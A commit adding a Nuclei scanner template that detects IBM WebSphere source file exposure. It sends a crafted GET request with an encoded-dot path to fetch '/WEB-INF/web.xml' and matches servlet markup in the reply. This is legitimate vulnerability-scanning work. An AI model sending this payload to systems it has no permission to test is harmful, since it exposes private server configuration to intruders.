Merge pull request #7288 from projectdiscovery/pussycat0x-patch-6

IBM WebSphere application - Source File Exposure
patch-1
Dhiyaneshwaran 2023-05-24 23:51:05 +05:30 committed by GitHub
commit 9c7ef7c0ce
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 31 additions and 0 deletions

View File

@ -0,0 +1,31 @@
id: ibm-websphere-xml
info:
name: IBM WebSphere Application - Source File Exposure
author: r3nz0
severity: medium
description: |
Disclose application specific files contained within the war file, including files under the web-inf and meta-inf directories.
reference:
- https://www.acunetix.com/vulnerabilities/web/ibm-websphere-weblogic-application-source-file-exposure/
metadata:
verified: "true"
tags: ibm,websphere,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/iojs/%2e/WEB-INF/web.xml"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</web-app>"
- "<servlet>"
condition: and
- type: status
status:
- 200